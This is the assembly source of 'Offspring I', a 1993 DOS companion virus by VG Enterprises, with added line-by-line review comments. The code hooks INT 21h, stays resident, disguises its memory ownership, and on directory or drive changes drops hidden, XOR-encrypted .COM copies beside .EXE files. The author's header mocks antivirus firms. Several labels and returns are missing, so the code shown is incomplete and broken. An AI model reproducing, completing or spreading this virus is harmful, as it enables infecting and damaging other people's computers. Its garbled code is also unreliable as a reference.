; OSPRING.COM - Make sure you compile this to a COM file
; - Compatible with A86 v3.22
; OFFSPRING I - By VG Enterprises (Virogen)
; NOTICE : Don't hold me responsible for any damages, or the release
; of this virus. Use this at your own risk. NOT intended
; for any lamers to upload the Mcafee! Thank you for your
; loyal obedience.
; - Mutation engine much smaller
; - Now change interrupt vectors directly
; - The XOR number is now generated randomly
; using the system clock as a base.
; - The FF/FN buffer has been moved outside
; of the virus code, so disk space is
; lowered.
; INFECTION METHOD : Every time DOS changes directories, or changes
; drives... all files in the CURRENT directory
; (the one you're coming out of) will be infected.
; COM files will be hidden, and have the read-only
; attribute. When they are executed they will
; check if the virus is already in memory, and
; then execute the corresponding EXE file. See
; This virus is NOT completed, so don't go off when you find a
; bug. There is one that I haven't determined the cause of yet,
; Do a 'DIR' of a directory other than the current, and see
; what happens. There's still some variables that can be
; moved outside of the code, but it won't make a hell of
; a difference in size.
; Syntax: MASM/A86 Intel syntax, 16-bit real mode, single-segment COM image
; (all segment registers are equal at load). Everything lives in cseg.
title off_spring_1
cseg segment
assume cs: cseg, ss: cseg, es: cseg
signal equ 7dh ; Installation check: the AH value new21 recognises
reply equ 0FCh ; AH value new21 hands back when the virus is already resident
cr equ 0dh ; carriage return
lf equ 0ah ; line feed
f_name equ 1eh ; Offset of the 8.3 file name inside the FindFirst/FindNext DTA
f_sizel equ 1ch ; NOTE(review): labelled "size low", but in the DOS FindFirst DTA the size dword starts at 1Ah, so 1Ch is its high word - resident's zero test then skips files of 64 KiB or more; confirm
org 100h ; Leave room for PSP
; Entry stub at offset 100h. In the assembled image the first instruction
; skips the decryption loop because the body is stored in the clear; main
; later overwrites offsets 100h-102h with NOPs, so the copy that write_file
; drops into a new file falls through into the decryption loop when it runs.
; NOTE(review): that overwrite assumes a 3-byte near jmp is emitted here -
; confirm against the assembler listing.
jmp no_dec ; Skip decryption (no_dec is not defined on this page); NOPed in infected copies
lea di,enc_data+2 ; di = first word to decrypt (the word after the key)
mov dx,[di-2] ; dx = XOR key stored in enc_data
call encrypt ; XOR is its own inverse, so the same routine decrypts
jmp main ; Jump to main routine
; Data area. Everything from enc_data+2 up to end_encrypt is XORed when the
; virus is written out; enc_data itself stays in the clear because it holds
; the key the entry stub reads back.
enc_data DW 0000 ; XOR key; write_file stores a clock-derived value here in the outgoing copy
ID DB cr,lf,'(c)1993 VG Enterprises',cr,lf ; Printed by main (AH=09h) when the day of month is 14
VNAME Db cr,lf,'* Congratulations, You have recieved the privelge of being infected by the *'
Db cr,lf,'* Offspring I v0.05. *','$' ; '$'-terminated; VNAME is not referenced anywhere on this page
fname db '*.EXE',0 ; ASCIZ filespec for the AH=4Eh FindFirst in resident
sl db '\' ; Leading backslash: main passes offset file_dir-1 to EXEC, so the path starts here
file_dir db 64 dup(0) ; "<cwd>\<name>.EXE" of the EXE that was companioned (built by resident)
file_name db 13 dup(0) ; 8.3 name buffer; zero-filled together with file_dir in resident
old_dta dd 0 ; Caller's DTA (seg:off) saved by new21 around the resident call
old21_ofs dw 0 ; Offset of the original INT 21h vector (read from 0:84h by Install)
old21_seg dw 0 ; Segment of the original INT 21h vector (read from 0:86h); must stay adjacent to old21_ofs for the far jmp in new21
; DOS EXEC (AX=4B00h) parameter block: environment segment, far pointer to
; the command tail, far pointers to FCB #1 and FCB #2. Segment words are
; filled in by main at run time.
par_blk dw 0 ; Environment segment (copied from PSP:2Ch)
par_cmd dw 0080h ; Command tail offset in the PSP
par_seg dw 0 ; Command tail segment (set to cs)
dw 05ch ; FCB #1 offset in the PSP
par1 dw 0 ; FCB #1 segment (set to cs)
dw 06ch ; FCB #2 offset in the PSP
par2 dw 0 ; FCB #2 segment (set to cs)
; ------------------------------------------------------------
; new21 - replacement INT 21h handler installed by Install.
;   AH=signal (7Dh): installation check; sets AH=reply and passes the
;                    call on to the original handler.
;   AH=3Bh (chdir):  jumps to run_res (not defined on this page).
;   AH=0Eh (select disk): saves all registers and the caller's DTA,
;                    runs resident (infects the directory being left,
;                    since the original handler has not run yet), then
;                    restores the DTA and registers.
;   Anything else chains to the original INT 21h vector.
; The INT 21h calls made from inside this handler re-enter new21; none of
; them use AH=3Bh/0Eh/signal, so they pass straight through.
; ------------------------------------------------------------
new21 proc ; New INT 21H handler
cmp ah, signal ; Installation check from Install?
jne no ; no is not defined on this page
mov ah,reply ; Answer in AH. NOTE(review): reaches the caller only if the original handler leaves AH alone for this function number - confirm
jmp end_21
cmp ah, 3bh ; Change directory?
je run_res ; run_res is not defined on this page
cmp ah,0eh ; Select disk?
jne end_21 ; Neither: pass the call through untouched
push ax ; Preserve everything resident and the DOS calls below may touch
push bx
push cx
push dx
push di
push si
push bp
push ds
push es
push sp
push ss
push cs
pop ds ; ds = virus segment
mov ah,2fh
int 21h ; Get the caller's DTA into es:bx
mov ax,es
mov word ptr cs: old_dta,bx
mov word ptr cs: old_dta+2,ax
push cs
pop es ; es = virus segment (string moves in resident use es:di)
call resident ; Infect the current directory
mov dx,word ptr cs: old_dta
mov ax,word ptr cs: old_dta+2
mov ds,ax
mov ah,1ah
int 21h ; Restore the caller's DTA from ds:dx
pop ss ; Restore in reverse push order
pop sp
pop es
pop ds
pop bp
pop si
pop di
pop dx
pop cx
pop bx
pop ax
end_21 :
jmp [ dword ptr cs: old21_ofs] ; Chain to the original INT 21h (old21_ofs:old21_seg)
new21 endp ; End of handler
; ------------------------------------------------------------
; main - runs once the body has been decrypted.
;  1. Patches the entry jmp at 100h to NOPs so the in-memory image (the
;     source of every copy write_file makes) runs the decryption loop
;     when it is loaded again.
;  2. Shrinks the program's memory block to the image size (AH=4Ah).
;  3. Fills in the segment words of the EXEC parameter block.
;  4. Prints ID on the 14th of the month.
;  5. Calls Install, which goes TSR (and does not return) on the first run.
;  6. EXECs the companioned EXE whose path sits at sl/file_dir, then exits.
; -----------------------------------------------------------
main proc
mov word ptr [0100h],9090h ; NOP the entry jmp: bytes 100h-101h
mov byte ptr [0102h],90h ; and its third byte
mov bx,(offset vend+50) ; Bytes to keep, measured from the PSP base (org 100h is included)
mov cl,4 ; Bytes -> paragraphs
shr bx,cl
inc bx ; round up
mov ah,4ah
int 21h ; Resize the memory block addressed by es (the PSP in a COM image)
mov ax,ds: 002ch ; Environment segment from the PSP
mov par_blk,ax ; into the EXEC parameter block
mov par1,cs ; FCB #1 segment
mov par2,cs ; FCB #2 segment
mov par_seg,cs ; Command tail segment
mov ah,2ah ; Get date: dl = day of month
int 21h
cmp dl,14 ; Trigger day
jne no_display ; no_display is not defined on this page
mov ah,09 ; Print the '$'-terminated ID string
lea dx,ID
int 21h
call install ; Installation check; hooks INT 21h and goes TSR if not yet resident
mov dx,offset file_dir -1 ; ds:dx = '\' + saved path of the original EXE (sl sits just before file_dir)
mov bx,offset par_blk ; es:bx = EXEC parameter block
mov ax,4b00h ; EXEC, load and execute
int 21h ; The author notes that control does not come back here
push cs
pop ds
mov es,ds
mov ah,4ch ; Terminate process
int 21h
main endp
; ------------------------------------------------------------
; Install - installation check, INT 21h hook, terminate-and-stay-resident.
; Issues INT 21h with AH=signal; if a resident copy answers AH=reply the
; hook is skipped (no_install). Otherwise the current vector at 0:84h is
; saved in old21_ofs/old21_seg, replaced with cs:new21 by writing the
; interrupt vector table directly (no AH=25h/35h), and the image stays
; resident via AH=31h. The 31h call ends the process, so on the
; installing run control never returns to main.
; Expects ds = cs on entry (the old vector is stored through ds:).
; ------------------------------------------------------------
Install Proc
mov ah,signal
int 21h ; Installation check, answered by new21 when resident
cmp ah,reply
je no_install ; no_install is not defined on this page
xor ax,ax
mov es,ax ; es = 0 -> interrupt vector table
mov ax,es: [21h*4+2] ; Segment of the current INT 21h vector
mov bx,es: [21h*4] ; Offset
mov ds: old21_seg,ax ; Store segment
mov ds: old21_ofs,bx ; Store offset
mov es: [21h*4+2],cs ; Point the vector at new21
mov es: [21h*4],offset new21
push cs
pop ds
mov es,ds
mov dx,(offset vend+50)
add dx,dx ; Keep twice the image size: room above vend for the DTA and the working copy copy_mem builds at vend+50
; Calculate memory needed
mov cl,4 ; Bytes -> paragraphs
shr dx,cl
add dx,1 ; round up
mov ax,3100h ; TSR, return code 0
int 21H ; Terminate Stay Resident
Install Endp
; ------------------------------------------------------------
; resident - called from new21 (AH=0Eh path) with ds = es = cs.
; Marks the virus's MCB as owned by DOS, then walks every *.EXE in the
; current directory with FindFirst/FindNext (DTA placed at vend). For
; each match whose word at DTA+f_sizel is zero it records
; "<cwd>\<name>.EXE" in file_dir, rewrites the DTA name to .COM and calls
; write_file to create the companion file.
; Clobbers ax, bx, cx, dx, si, di, ds (new21 saves and restores them).
; No ret precedes resident endp on this page; end_prog and loop_me are
; not defined on this page.
; ------------------------------------------------------------
resident proc
mov ax,ds ; The memory control block is one paragraph below the PSP
dec ax
mov ds,ax
mov ds: [0001],word 0008h ; MCB owner field = 0008h (DOS), so memory
; listers attribute this block to DOS instead
; of the file the virus was loaded from.
push cs
pop ds ; back to the virus segment
mov word ptr vend,0 ; Zero-fill 46 bytes at vend for the DTA: the
lea si, vend ; overlapping forward copy propagates the zero word
lea di, vend+2
mov cx,22
cld ; string moves below run forward
rep movsw
; Set DTA address - used by the FindFirst/FindNext INT 21h functions
mov ah, 1ah
lea dx, vend
int 21h
; Find first .EXE file
mov ah, 4eh
mov cx, 0 ; Attribute mask 0: normal files only
lea dx, fname ; '*.EXE'
int 21h
jnc next_loop
jmp end_prog ; No match (end_prog is not defined on this page)
next_loop :
mov file_dir,0 ; Zero-fill file_dir/file_name with the same overlapping-copy trick
lea si,file_dir
lea di,file_dir+1
mov cx,77
rep movsb
mov ah,47h ; Get current directory of the default drive (dl=0) into ds:si
xor dl,dl
lea si,file_dir ; DOS returns the path without a leading '\'; sl supplies it
int 21h
cmp word ptr vend[f_sizel],0 ; Skip files whose size word at DTA+1Ch is nonzero
jne find_file
xor bx,bx
lm3 : ; Find the terminating NUL of file_dir (scan starts at index 1)
inc bx
cmp file_dir[bx],0
jne lm3
mov file_dir[bx],'\' ; Append '\' and the 13-byte file name from the DTA
inc bx
mov cx,13
lea si,vend[f_name]
lea di,file_dir[bx]
rep movsb
xor bx,bx
mov bx,1eh ; bx = f_name
inc bx ; second character of the found name
cmp byte ptr vend[bx], '.' ; As written only names whose 2nd character is '.' pass this test
jne loop_me ; loop_me is not defined on this page
inc bx
mov word ptr vend [bx],'OC' ; Overwrite the extension in the DTA name: bytes 'C','O' ...
mov byte ptr vend [bx+2],'M' ; ... then 'M' -> "<name>.COM"
call write_file ; Create the companion and write the encrypted image into it
; Find next file
find_file :
mov ah,4fh
int 21h
jnc next_loop
exit :
resident endp
; ------------------------------------------------------------
; write_file - create the companion file and write the encrypted image.
; In:  vend[f_name] = target name (already changed to .COM by resident),
;      ds = es = cs, DF clear.
; Creates the file with AH=3Ch and attributes read-only|hidden (03h); a
; failed create is treated as "already infected" (no_infect is not defined
; on this page). copy_mem duplicates offsets 100h..vend-1 at vend+50 (the
; entry jmp there is already NOPed by main), a clock-derived key is stored
; in the copy's enc_data, the copy is XORed by encrypt, then vend-100h
; bytes are written and the handle closed.
; Clobbers ax, bx, cx, dx, si, di.
; ------------------------------------------------------------
write_file proc
lea dx, vend[f_name] ; ds:dx = ASCIZ name from the DTA
mov ah, 3ch ; Create file
mov cx, 02h ; Attribute: hidden (02h) ...
or cx, 01h ; ... | read-only (01h)
int 21h ; Call INT 21H
jc no_infect ; Create failed - taken as already infected (no_infect is not defined on this page)
mov bx,ax ; bx = file handle
push dx ; keep the name pointer across the calls below
call copy_mem ; working copy of 100h..vend-1 at vend+50
mov ah,2ch ; Get time: dh = seconds, dl = hundredths
int 21h ; dx is used as the XOR key
lea di,vend+enc_data-204 ; enc_data+2 inside the copy (copy base vend+50 corresponds to 100h)
mov [di-2],dx ; store the key in the copy's enc_data word
push bx ; preserve the handle around encrypt
call encrypt ; XOR the copy from enc_data+2 through end_encrypt
pop bx
mov cx, offset vend-100h ; Bytes to write: the whole image from 100h to vend
lea dx, vend+50 ; from the encrypted working copy
mov ah, 40h ; Write to handle bx
int 21h ; Call INT 21H function 40h
pop dx
mov ah, 3eh ; Close handle
int 21h
ret ; Return
write_file endp
; ------------------------------------------------------------
; copy_mem - copy the image (offsets 100h..vend-1, vend-100h bytes) to
; vend+50 so it can be encrypted without touching the running code.
; Expects ds = es = cs and DF clear (resident executed cld).
; Clobbers cx, si, di. No ret precedes copy_mem endp on this page.
; ------------------------------------------------------------
copy_mem proc
mov si,0100h ; source = start of the image, PSP excluded
lea di,vend+50 ; destination
mov cx,offset vend-100h ; bytes to move
rep movsb
copy_mem endp
end_encrypt dw 0000h ; End marker for encrypt's word count; with the run starting at enc_data+2 this word itself is the last one XORed (or the one before it if the span is odd)
; ------------------------------------------------------------
; encrypt - XOR a run of words with dx (symmetric: the same call decrypts).
; In:  di = first word to process (enc_data+2 in the image or in its copy)
;      dx = XOR key
; Count = (end_encrypt - enc_data)/2 words, so starting from enc_data+2
; the run ends at end_encrypt; the key word enc_data itself is left in
; the clear so the entry stub at 100h can read it back.
; Clobbers cx, di, flags. The loop target E2 and a ret are not present on
; this page.
; ------------------------------------------------------------
encrypt proc
mov cx,(offset end_encrypt - offset enc_data)/2 ; word count
xor [di],dx ; Xor each word by dx
inc di
inc di ; next word
loop E2 ; E2 is not defined on this page
encrypt endp
vend dw 0 ; End-of-image marker: the DTA is placed here at run time and the encrypted working copy at vend+50
cseg ends
end start ; start is not defined on this page; the COM entry point is the jmp at org 100h